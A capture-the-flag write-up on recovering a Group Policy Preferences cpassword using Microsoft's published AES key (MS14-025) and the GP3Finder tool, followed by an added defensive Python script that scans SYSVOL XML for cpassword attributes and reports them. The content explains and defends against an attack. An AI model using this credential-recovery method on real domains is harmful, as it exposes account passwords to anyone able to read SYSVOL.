First, download the file and unzip it.
In order to solve this challenge, you need to decrypt something called "cpassword", which is easy thanks to this: "Microsoft published the AES encryption key used to protect cpassword attributes in Group Policy preference items (CVE-2014-1812 / MS14-025)."
If you use Windows, you can download this program that does not require installation: https://bitbucket.org/grimhacker/gpppfinder/downloads/
Once downloaded, you have to find the following file inside the unzipped challenge archive: Policies\{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}\User\Preferences\Groups\Groups.xml
Once opened, you will see: cpassword=PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw
This base64 string is missing its padding. You need to add "=" at the end to make it valid.
Once done, run the program with that base64 password and you will get the following:
Group Policy Preference Password Finder (GP3Finder) 5.0.0
Copyright (C) 2020 Oliver Morton
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.
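A defender's counterpart to the steps above: rather than decrypting one value by hand, audit every GPP XML file under a SYSVOL copy (or an unzipped challenge archive like this one) for cpassword attributes, repair the stripped base64 padding the write-up mentions, and report which account each one belongs to. This Python script is an added example written for this edit, not code from the write-up or from GP3Finder. The Groups.xml it parses is constructed: only the cpassword value is the one from the page, while the account name, attributes and timestamp are placeholders. It stops at reporting the ciphertext; the decryption itself (AES with the key Microsoft published, MS14-025) is left to the tool the page names.

```python
"""Audit GPP XML for cpassword attributes (added example, not the write-up's code)."""
import base64
import xml.etree.ElementTree as ET
from pathlib import Path

# Attribute names that identify the account on GPP Properties elements; any element
# carrying cpassword is reported even if none of these is present.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "name")


def repair_base64(value: str) -> str:
    """GPP stores cpassword without '=' padding; restore it so decoders accept it."""
    return value + "=" * (-len(value) % 4)


def find_cpasswords(xml_text: str, origin: str = "<inline>") -> list:
    """Return one finding per element carrying a cpassword attribute."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cp = elem.get("cpassword")
        if cp is None:
            continue
        padded = repair_base64(cp)
        raw = base64.b64decode(padded)
        # The Properties element's own attributes name the account when present.
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "<unknown>")
        findings.append({
            "file": origin,
            "element": elem.tag,
            "account": account,
            "cpassword": padded,
            "ciphertext_bytes": len(raw),
            "aes_block_aligned": len(raw) % 16 == 0,   # sanity check: AES-CBC ciphertext
            "reference": "MS14-025 / CVE-2014-1812",
        })
    return findings


def audit_sysvol(root: Path) -> list:
    """Walk a SYSVOL copy (or an unzipped archive) and audit every .xml file in it."""
    results = []
    for path in root.rglob("*.xml"):
        try:
            results.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
        except ET.ParseError:
            continue   # not a GPP XML file
    return results


# Constructed sample: the cpassword is the value shown in the challenge; the account
# name, the remaining attributes and the timestamp are placeholders.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc_placeholder" changed="2020-01-01 00:00:00">
    <Properties action="U" userName="svc_placeholder"
      cpassword="PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for finding in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(finding)
```

Point audit_sysvol() at a mounted or copied \\domain\SYSVOL\domain\Policies tree to list every GPP item still carrying a cpassword; each hit is a finding in its own right, because the value is recoverable by anyone who can read SYSVOL, which by default is every domain user. The padding repair yields a 32-byte ciphertext for the page's value, two AES blocks, which is what the page's advice to append "=" amounts to.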